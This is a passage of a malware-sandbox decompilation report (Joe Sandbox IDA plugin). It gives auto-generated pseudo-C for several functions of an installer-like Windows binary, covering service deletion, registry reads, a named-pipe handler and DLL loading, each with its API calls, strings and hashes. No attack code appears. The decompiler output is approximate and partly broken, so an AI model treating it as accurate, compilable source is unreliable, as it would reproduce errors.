                        C-Code - Quality: 75%
                        			E010611A0(void* __edi) {
                        				void* __ebx;
                        				void* __esi;
                        				long _t4;
                        				void* _t8;
                        				int _t10;
                        				void* _t15;
                        				void* _t23;
                        				void* _t28;
                        
                        				_t21 = 0;
                        				_t28 = OpenSCManagerW(0, L"ServicesActive", 1);
                        				if(_t28 != 0) {
                        					_push(__edi);
                        					_t23 = OpenServiceW(_t28, L"MSIServer", 0x10000);
                        					__eflags = _t23;
                        					if(_t23 == 0) {
                        						_t4 = GetLastError();
                        						__eflags = _t4 - 0x424;
                        						if(_t4 != 0x424) {
                        							_push("Failed to open MSI service\n");
                        							_t8 = E01062E24() + 0x40;
                        							__eflags = _t8;
                        							_push(_t8);
                        							E01062F67(0, _t23, _t28, _t8);
                        							_t21 = 1;
                        						}
                        						CloseServiceHandle(_t28);
                        						return _t21;
                        					} else {
                        						_t10 = DeleteService(_t23);
                        						__eflags = _t10;
                        						if(_t10 == 0) {
                        							_push("Failed to delete MSI service\n");
                        							_t15 = E01062E24() + 0x40;
                        							__eflags = _t15;
                        							_push(_t15);
                        							E01062F67(0, _t23, _t28, _t15);
                        							_t21 = 1;
                        						}
                        						CloseServiceHandle(_t23);
                        						CloseServiceHandle(_t28);
                        						return _t21;
                        					}
                        				} else {
                        					_push("Failed to open service control manager\n");
                        					_t18 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(0, __edi, _t28, _t18);
                        					_t1 = _t21 + 1; // 0x1
                        					return _t1;
                        				}
                        			}

                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 010611AC
                        • _fprintf.LIBCMT ref: 010611C6
                        • OpenServiceW.ADVAPI32(00000000,MSIServer,00010000), ref: 010611E0
                        • DeleteService.ADVAPI32(00000000), ref: 010611ED
                        • _fprintf.LIBCMT ref: 01061205
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061219
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106121C
                        Strings
                        • ServicesActive, xrefs: 010611A4
                        • Failed to open service control manager, xrefs: 010611B8
                        • Failed to delete MSI service, xrefs: 010611F7
                        • Failed to open MSI service, xrefs: 01061231
                        • MSIServer, xrefs: 010611DA
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandleOpen_fprintf$DeleteManager
                        • String ID: Failed to delete MSI service$Failed to open MSI service$Failed to open service control manager$MSIServer$ServicesActive
                        • API String ID: 2904554157-4128441400
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01075AAD(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t12;
                        				intOrPtr _t13;
                        				intOrPtr _t17;
                        				intOrPtr* _t45;
                        
                        				if(_a4 > 5 || _a8 == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_t45 = E01064F0A(8, 1);
                        					_t52 = _t45;
                        					if(_t45 != 0) {
                        						_t12 = E01064F0A(0xb8, 1);
                        						 *_t45 = _t12;
                        						__eflags = _t12;
                        						if(_t12 != 0) {
                        							_t13 = E01064F0A(0x220, 1);
                        							 *((intOrPtr*)(_t45 + 4)) = _t13;
                        							__eflags = _t13;
                        							if(_t13 != 0) {
                        								E010755D5( *_t45, 0x1080d40);
                        								__eflags = E01075ECD(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
                        								if(__eflags != 0) {
                        									_t17 = E0106DBBB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
                        									__eflags = _t17;
                        									if(_t17 == 0) {
                        										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
                        										L17:
                        										return _t45;
                        									}
                        									E01064ED2( *((intOrPtr*)(_t45 + 4)));
                        									E0107024B( *_t45);
                        									E010700F1( *_t45);
                        									E01064ED2(_t45);
                        									L15:
                        									_t45 = 0;
                        									goto L17;
                        								}
                        								E0107024B( *_t45);
                        								E010700F1( *_t45);
                        								E01064ED2(_t45);
                        								goto L15;
                        							}
                        							E01064ED2( *_t45);
                        							E01064ED2(_t45);
                        							L8:
                        							goto L3;
                        						}
                        						E01064ED2(_t45);
                        						goto L8;
                        					}
                        					L3:
                        					 *((intOrPtr*)(E010647CC(_t52))) = 0xc;
                        					goto L4;
                        				}
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 2661855409-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061B50(short* _a4, intOrPtr _a8, WCHAR*** _a12) {
                        				void* _v8;
                        				int _v12;
                        				int _v16;
                        				intOrPtr _v20;
                        				void* _t29;
                        				intOrPtr _t43;
                        				intOrPtr _t54;
                        				void* _t57;
                        				void* _t60;
                        
                        				_v12 = 0;
                        				_v16 = 0;
                        				_t57 = 0;
                        				if(RegOpenKeyW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\RunOnceEntries",  &_v8) == 0) {
                        					_t29 = RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12);
                        					__eflags = _t29;
                        					if(_t29 != 0) {
                        						L9:
                        						RegCloseKey(_v8);
                        						return _t57;
                        					} else {
                        						__eflags = _v16 - 1;
                        						if(_v16 != 1) {
                        							goto L9;
                        						} else {
                        							_t54 = lstrlenW( *( *_a12)) + _t34;
                        							_v20 = _t54;
                        							_t60 = HeapAlloc(GetProcessHeap(), 0, _v12 + 2 + _t54);
                        							__eflags = _t60;
                        							if(_t60 != 0) {
                        								E01063C60(_t60,  *( *_a12), _v20);
                        								_t43 = _v20;
                        								 *((short*)(_t43 + _t60)) = 0x20;
                        								__eflags = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t43 + 2 + _t60,  &_v12);
                        								if(__eflags == 0) {
                        									E01061A90(__eflags, _t60, _a8, _a12);
                        									_t57 = 1;
                        								}
                        								HeapFree(GetProcessHeap(), 0, _t60);
                        								goto L9;
                        							} else {
                        								RegCloseKey(_v8);
                        								__eflags = 0;
                        								return 0;
                        							}
                        						}
                        					}
                        				} else {
                        					return 0;
                        				}
                        			}

                        APIs
                        • RegOpenKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries,?), ref: 01061B75
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 01061B9B
                        • lstrlenW.KERNEL32(?), ref: 01061BBA
                        • GetProcessHeap.KERNEL32(00000000,-00000002), ref: 01061BD1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061BD8
                        • RegCloseKey.ADVAPI32(?), ref: 01061BE7
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 01061B5B
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValuelstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries
                        • API String ID: 4113790418-2918440441
                        • Opcode ID: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction ID: a077f6b21ba31d1dcf03752a00769700df647098c60a341b5ea5ef9f043b4280
                        • Opcode Fuzzy Hash: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction Fuzzy Hash: FC313C72A0020CEFDB229FA8DC49FAEBBB9FF45310F004095F951E6150DB369A20DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E01065168(void* __eax, void* __ebx) {
                        				intOrPtr _t5;
                        				LONG* _t8;
                        				void* _t9;
                        				void* _t14;
                        				void* _t24;
                        				intOrPtr* _t25;
                        				intOrPtr* _t26;
                        
                        				_t14 = __ebx;
                        				__imp__DecodePointer( *0x1081d68);
                        				_t25 =  *0x1081028;
                        				_t24 = __eax;
                        				if(_t25 != 0) {
                        					while( *_t25 != 0) {
                        						E01064ED2( *_t25);
                        						_t25 = _t25 + 4;
                        						if(_t25 != 0) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_t25 =  *0x1081028;
                        				}
                        				_push(_t14);
                        				E01064ED2(_t25);
                        				_t26 =  *0x1081024;
                        				 *0x1081028 = 0;
                        				if(_t26 != 0) {
                        					while( *_t26 != 0) {
                        						E01064ED2( *_t26);
                        						_t26 = _t26 + 4;
                        						if(_t26 != 0) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_t26 =  *0x1081024;
                        				}
                        				E01064ED2(_t26);
                        				 *0x1081024 = 0;
                        				E01064ED2( *0x1081020);
                        				_t5 = E01064ED2( *0x108101c);
                        				 *0x1081020 = 0;
                        				 *0x108101c = 0;
                        				if(_t24 != 0xffffffff) {
                        					_t5 = E01064ED2(_t24);
                        				}
                        				__imp__EncodePointer(0);
                        				 *0x1081d68 = _t5;
                        				_t6 =  *0x1081048;
                        				if( *0x1081048 != 0) {
                        					E01064ED2(_t6);
                        					 *0x1081048 = 0;
                        				}
                        				_t7 =  *0x108104c;
                        				if( *0x108104c != 0) {
                        					E01064ED2(_t7);
                        					 *0x108104c = 0;
                        				}
                        				_t8 = InterlockedDecrement( *0x10806ac);
                        				if(_t8 == 0) {
                        					_t8 =  *0x10806ac; // 0x10809a8
                        					if(_t8 != 0x10809a8) {
                        						_t9 = E01064ED2(_t8);
                        						 *0x10806ac = 0x10809a8;
                        						return _t9;
                        					}
                        				}
                        				return _t8;
                        			}

                        APIs
                        • DecodePointer.KERNEL32 ref: 01065170
                        • _free.LIBCMT ref: 01065189
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EF8
                        • _free.LIBCMT ref: 0106519C
                        • _free.LIBCMT ref: 010651BA
                        • _free.LIBCMT ref: 010651CC
                        • _free.LIBCMT ref: 010651DD
                        • _free.LIBCMT ref: 010651E8
                        • _free.LIBCMT ref: 01065202
                        • EncodePointer.KERNEL32(00000000), ref: 01065209
                        • _free.LIBCMT ref: 0106521E
                        • _free.LIBCMT ref: 01065234
                        • InterlockedDecrement.KERNEL32 ref: 01065246
                        • _free.LIBCMT ref: 01065260
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                        • String ID:
                        • API String ID: 4264854383-0
                        • Opcode ID: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction ID: 86a43876cb99d79e0f667269f0d71909e1f07fb5aa7627368c323dc7b2f63edb
                        • Opcode Fuzzy Hash: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction Fuzzy Hash: 9B213075E09252DFD7316F18FC4459E3BE8AF287607144069F6C4A6248C7BE98638F54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 56%
                        			E01061700(long _a4) {
                        				struct _OVERLAPPED* _v8;
                        				void _v12;
                        				void _v28;
                        				short _v76;
                        				intOrPtr _t15;
                        				void* _t33;
                        				void* _t36;
                        				void* _t38;
                        				void* _t39;
                        				void* _t40;
                        
                        				_t15 = E01062D5A(_a4, 0, 0xa);
                        				 *0x1080ea0 = _t15;
                        				if(_t15 != 0) {
                        					swprintf( &_v76, 0, L"\\\\.\\pipe\\msica_%x_%d", _t15, 0x20, _t39);
                        					_t40 = CreateFileW( &_v76, 0xc0000000, 0, 0, 3, 0, 0);
                        					if(_t40 != 0xffffffff) {
                        						__imp__CoInitializeEx(0, 0, _t36, _t33);
                        						if(ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
                        							_t38 = _a4;
                        							while(_a4 == 0x10) {
                        								asm("movq xmm0, [ebp-0x18]");
                        								asm("movq [edi], xmm0");
                        								asm("movq xmm0, [ebp-0x10]");
                        								asm("movq [edi+0x8], xmm0");
                        								_v12 = CreateThread(0, 0, E01061820, _t38, 0, 0);
                        								_v8 = 0;
                        								if(WriteFile(_t40,  &_v12, 8,  &_a4, 0) != 0 && _a4 == 8 && ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
                        									continue;
                        								}
                        								goto L10;
                        							}
                        						}
                        						L10:
                        						__imp__CoUninitialize();
                        						return GetLastError();
                        					} else {
                        						return GetLastError();
                        					}
                        				} else {
                        					return 1;
                        				}
                        			}

                        APIs
                        • swprintf.LIBCMT ref: 01061738
                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01061753
                        • GetLastError.KERNEL32 ref: 01061760
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CreateErrorFileLastswprintf
                        • String ID: \\.\pipe\msica_%x_%d
                        • API String ID: 2902539988-2637677629
                        • Opcode ID: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction ID: 015d86fb1fc28f1ea0c4df5d32db43eecdcf1bf46c17c40f16496d308c0dc946
                        • Opcode Fuzzy Hash: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction Fuzzy Hash: 2031B471A40309BAEB319AA4DC46FEE7B7CEB44711F104122FB84EA0C0EBB5A555C7E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E010665CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				signed int* _t81;
                        				void* _t86;
                        				long _t90;
                        				intOrPtr _t94;
                        				signed int _t98;
                        				signed int _t99;
                        				signed char _t103;
                        				intOrPtr* _t105;
                        				intOrPtr _t106;
                        				intOrPtr* _t109;
                        				signed char _t111;
                        				long _t119;
                        				signed int _t130;
                        				signed int* _t134;
                        				intOrPtr _t135;
                        				signed int* _t138;
                        				void** _t139;
                        				intOrPtr _t141;
                        				void* _t142;
                        				signed int _t143;
                        				void** _t147;
                        				signed int _t149;
                        				void* _t150;
                        				void** _t154;
                        				void* _t155;
                        
                        				_push(0x64);
                        				_push(0x107e0c0);
                        				E010668F0(__ebx, __edi, __esi);
                        				E01064D39(0xb);
                        				_t130 = 0;
                        				 *(_t155 - 4) = 0;
                        				if( *0x1081c60 == 0) {
                        					_push(0x40);
                        					_t141 = 0x20;
                        					_push(_t141);
                        					_t81 = E01064F0A();
                        					_t134 = _t81;
                        					 *(_t155 - 0x24) = _t134;
                        					if(_t134 != 0) {
                        						 *0x1081c60 = _t81;
                        						 *0x1081c44 = _t141;
                        						while(_t134 <  &(_t81[0x200])) {
                        							_t134[1] = 0xa00;
                        							 *_t134 =  *_t134 | 0xffffffff;
                        							_t134[2] = _t130;
                        							_t134[9] = _t134[9] & 0x00000080;
                        							_t134[9] = _t134[9] & 0x0000007f;
                        							_t134[9] = 0xa0a;
                        							_t134[0xe] = _t130;
                        							_t134[0xd] = _t130;
                        							_t134 =  &(_t134[0x10]);
                        							 *(_t155 - 0x24) = _t134;
                        							_t81 =  *0x1081c60;
                        						}
                        						GetStartupInfoW(_t155 - 0x74);
                        						if( *((short*)(_t155 - 0x42)) == 0) {
                        							while(1) {
                        								L31:
                        								 *(_t155 - 0x2c) = _t130;
                        								if(_t130 >= 3) {
                        									break;
                        								}
                        								_t147 =  *0x1081c60 + (_t130 << 6);
                        								 *(_t155 - 0x24) = _t147;
                        								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                        									_t147[1] = 0x81;
                        									if(_t130 != 0) {
                        										_t66 = _t130 - 1; // -1
                        										asm("sbb eax, eax");
                        										_t90 =  ~_t66 + 0xfffffff5;
                        									} else {
                        										_t90 = 0xfffffff6;
                        									}
                        									_t142 = GetStdHandle(_t90);
                        									if(_t142 == 0xffffffff || _t142 == 0) {
                        										L47:
                        										_t147[1] = _t147[1] | 0x00000040;
                        										 *_t147 = 0xfffffffe;
                        										_t94 =  *0x1081d7c;
                        										if(_t94 != 0) {
                        											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                        										}
                        										goto L49;
                        									} else {
                        										_t98 = GetFileType(_t142);
                        										if(_t98 == 0) {
                        											goto L47;
                        										}
                        										 *_t147 = _t142;
                        										_t99 = _t98 & 0x000000ff;
                        										if(_t99 != 2) {
                        											if(_t99 != 3) {
                        												L46:
                        												_t70 =  &(_t147[3]); // -17308756
                        												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                        												_t147[2] = _t147[2] + 1;
                        												goto L49;
                        											}
                        											_t103 = _t147[1] | 0x00000008;
                        											L45:
                        											_t147[1] = _t103;
                        											goto L46;
                        										}
                        										_t103 = _t147[1] | 0x00000040;
                        										goto L45;
                        									}
                        								} else {
                        									_t147[1] = _t147[1] | 0x00000080;
                        									L49:
                        									_t130 = _t130 + 1;
                        									continue;
                        								}
                        							}
                        							 *(_t155 - 4) = 0xfffffffe;
                        							E01066893();
                        							L2:
                        							_t86 = 1;
                        							L3:
                        							return E01066935(_t86);
                        						}
                        						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                        						if(_t105 == 0) {
                        							goto L31;
                        						}
                        						_t135 =  *_t105;
                        						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                        						_t106 = _t105 + 4;
                        						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                        						 *(_t155 - 0x20) = _t106 + _t135;
                        						if(_t135 >= 0x800) {
                        							_t135 = 0x800;
                        							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                        						}
                        						_t149 = 1;
                        						 *(_t155 - 0x30) = 1;
                        						while( *0x1081c44 < _t135) {
                        							_t138 = E01064F0A(_t141, 0x40);
                        							 *(_t155 - 0x24) = _t138;
                        							if(_t138 != 0) {
                        								0x1081c60[_t149] = _t138;
                        								 *0x1081c44 =  *0x1081c44 + _t141;
                        								while(_t138 <  &(0x1081c60[_t149][0x200])) {
                        									_t138[1] = 0xa00;
                        									 *_t138 =  *_t138 | 0xffffffff;
                        									_t138[2] = _t130;
                        									_t138[9] = _t138[9] & 0x00000080;
                        									_t138[9] = 0xa0a;
                        									_t138[0xe] = _t130;
                        									_t138[0xd] = _t130;
                        									_t138 =  &(_t138[0x10]);
                        									 *(_t155 - 0x24) = _t138;
                        								}
                        								_t149 = _t149 + 1;
                        								 *(_t155 - 0x30) = _t149;
                        								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                        								continue;
                        							}
                        							_t135 =  *0x1081c44;
                        							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                        							break;
                        						}
                        						_t143 = _t130;
                        						 *(_t155 - 0x2c) = _t143;
                        						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                        						_t139 =  *(_t155 - 0x20);
                        						while(_t143 < _t135) {
                        							_t150 =  *_t139;
                        							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                        								L26:
                        								_t143 = _t143 + 1;
                        								 *(_t155 - 0x2c) = _t143;
                        								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                        								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                        								_t139 =  &(_t139[1]);
                        								 *(_t155 - 0x20) = _t139;
                        								continue;
                        							} else {
                        								_t111 =  *_t109;
                        								if((_t111 & 0x00000001) == 0) {
                        									goto L26;
                        								}
                        								if((_t111 & 0x00000008) != 0) {
                        									L24:
                        									_t154 = 0x1081c60[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                        									 *(_t155 - 0x24) = _t154;
                        									 *_t154 =  *_t139;
                        									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                        									_t38 =  &(_t154[3]); // 0xd
                        									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                        									_t154[2] = _t154[2] + 1;
                        									_t139 =  *(_t155 - 0x20);
                        									L25:
                        									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                        									goto L26;
                        								}
                        								_t119 = GetFileType(_t150);
                        								_t139 =  *(_t155 - 0x20);
                        								if(_t119 == 0) {
                        									goto L25;
                        								}
                        								goto L24;
                        							}
                        						}
                        						goto L31;
                        					}
                        					E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
                        					_t86 = 0;
                        					goto L3;
                        				}
                        				E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
                        				goto L2;
                        			}
                        0x0106671c
                        0x01066721
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01066721
                        0x01066704
                        0x00000000
                        0x010666f7
                        0x0106662f
                        0x01066637
                        0x00000000
                        0x01066637
                        0x010665fb
                        0x00000000

                        APIs
                        • __lock.LIBCMT ref: 010665DD
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D,?,?,?,?,?,?,?,?,0107E188,00000008,0106B30F,00000000), ref: 01064D64
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 010665FB
                        • __calloc_crt.LIBCMT ref: 01066614
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0106662F
                        • GetStartupInfoW.KERNEL32(?,0107E0C0,00000064), ref: 01066684
                        • __calloc_crt.LIBCMT ref: 010666CF
                        • GetFileType.KERNEL32(00000001), ref: 01066716
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0106674F
                        • GetStdHandle.KERNEL32(-000000F6), ref: 01066808
                        • GetFileType.KERNEL32(00000000), ref: 0106681A
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(-01081C54,00000FA0), ref: 0106684F
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 301580142-0
                        • Opcode ID: 91088f4e5e3c71fdec2f7c17a813bf2cbe2e8b4719bf04680d8cde266205a0e2
                        • Instruction ID: d02c6f26573e3cf54219d590be0414b1c1634ef5372004761c7be1c46be34b2e
                        • Opcode Fuzzy Hash: 91088f4e5e3c71fdec2f7c17a813bf2cbe2e8b4719bf04680d8cde266205a0e2
                        • Instruction Fuzzy Hash: BB91B471D0534A8FDB24CF68D8905ADBBF8BF19324B2442ADD4E6A73D1D73A9802CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E010612A0(WCHAR* _a4, CHAR* _a8, struct HINSTANCE__** _a12) {
                        				void* __esi;
                        				void* __ebp;
                        				struct HINSTANCE__* _t5;
                        				int _t6;
                        				void* _t12;
                        				void* _t13;
                        				struct HINSTANCE__** _t14;
                        				void* _t15;
                        
                        				_t5 = LoadLibraryExW(_a4, 0, 8);
                        				_t14 = _a12;
                        				 *_t14 = _t5;
                        				if(_t5 == 0) {
                        					_push(_t5);
                        					_push("Unable to load dll %s\n");
                        					_t11 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					_t5 = E01062F67(_t12, _t13, _t14, _t11);
                        					_t15 = _t15 + 0xc;
                        					ExitProcess(1);
                        				}
                        				_t6 = GetProcAddress(_t5, _a8);
                        				if(_t6 == 0) {
                        					_push(_a8);
                        					_push(0x107b314);
                        					_push("Dll %s does not implement function %s\n");
                        					_t8 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(_t12, _t13, _t14, _t8);
                        					_t6 = FreeLibrary( *_t14);
                        					ExitProcess(1);
                        				}
                        				return _t6;
                        			}












                        APIs
                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,0106102C,?,DllRegisterServer,?), ref: 010612AB
                        • _fprintf.LIBCMT ref: 010612C9
                        • ExitProcess.KERNEL32 ref: 010612D3
                        • GetProcAddress.KERNEL32(00000000,?), ref: 010612DD
                        • _fprintf.LIBCMT ref: 010612FD
                        • FreeLibrary.KERNEL32(?), ref: 01061307
                        • ExitProcess.KERNEL32 ref: 0106130F
                        Strings
                        • Unable to load dll %s, xrefs: 010612BB
                        • Dll %s does not implement function %s, xrefs: 010612EF
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExitLibraryProcess_fprintf$AddressFreeLoadProc
                        • String ID: Dll %s does not implement function %s$Unable to load dll %s
                        • API String ID: 1970097361-2710538428
                        • Opcode ID: 21a25a2c916bac2505390016a9b12ea3b494277095e4b75908445cfbbdf8f036
                        • Instruction ID: eef788b28d1eff7ddc5ed73dfef5aabfd499977a017bbb5781ead36e0250d6b9
                        • Opcode Fuzzy Hash: 21a25a2c916bac2505390016a9b12ea3b494277095e4b75908445cfbbdf8f036
                        • Instruction Fuzzy Hash: 14F04472940305FBEB122FA69C09B893A5CEF10751F004414FAD5E9141EA7795504795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E01075B9D(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                        				signed int _v8;
